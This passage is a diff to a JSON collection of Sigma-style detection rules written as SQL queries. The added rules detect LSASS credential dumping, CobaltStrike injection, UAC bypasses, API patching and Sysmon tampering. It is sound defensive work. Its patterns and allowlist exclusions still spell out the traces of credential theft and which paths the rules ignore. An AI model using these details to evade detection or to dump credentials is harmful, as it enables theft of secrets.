'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 
'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Stop Windows Service Via Net.EXE", - "id": "88872991-7445-4a22-90b2-a3adadb0e827", - "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard 
executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\')" + "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_net_stop_service.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "UAC Bypass via Windows Firewall Snap-In Hijack", - "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", + "title": "Rare GrantedAccess Flags on LSASS Access", + "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", "status": "experimental", - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", - "author": "Tim Rauch", + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT 
(NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" ], - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + "filename": "proc_access_win_rare_proc_access_lsass.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - 
"attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "Data Copied To Clipboard Via Clip.EXE", - "id": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "status": "test", - "description": "Detects the execution of clip.exe in order to copy data to the clipboard. 
Adversaries may collect data stored in the clipboard from users copying information within or between applications.", - "author": "frack113", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\clip.exe' ESCAPE '\\' OR OriginalFileName = 'clip.exe'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_clip_execution.yml" + "filename": 
"proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Potential NT API Stub Patching", + "id": "b916cba1-b38a-42da-9223-17114d846fd6", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage 
LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_invoke_patchingapi.yml" }, { - "title": "Suspicious Cabinet File Expansion", - "id": "9f107a84-532c-41af-b005-8d12a607639f", - "status": "test", - "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "author": "Bhabesh Raj", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 
'Ente')" ], - "filename": "proc_creation_win_expand_cabinet_files.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE 
'%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' 
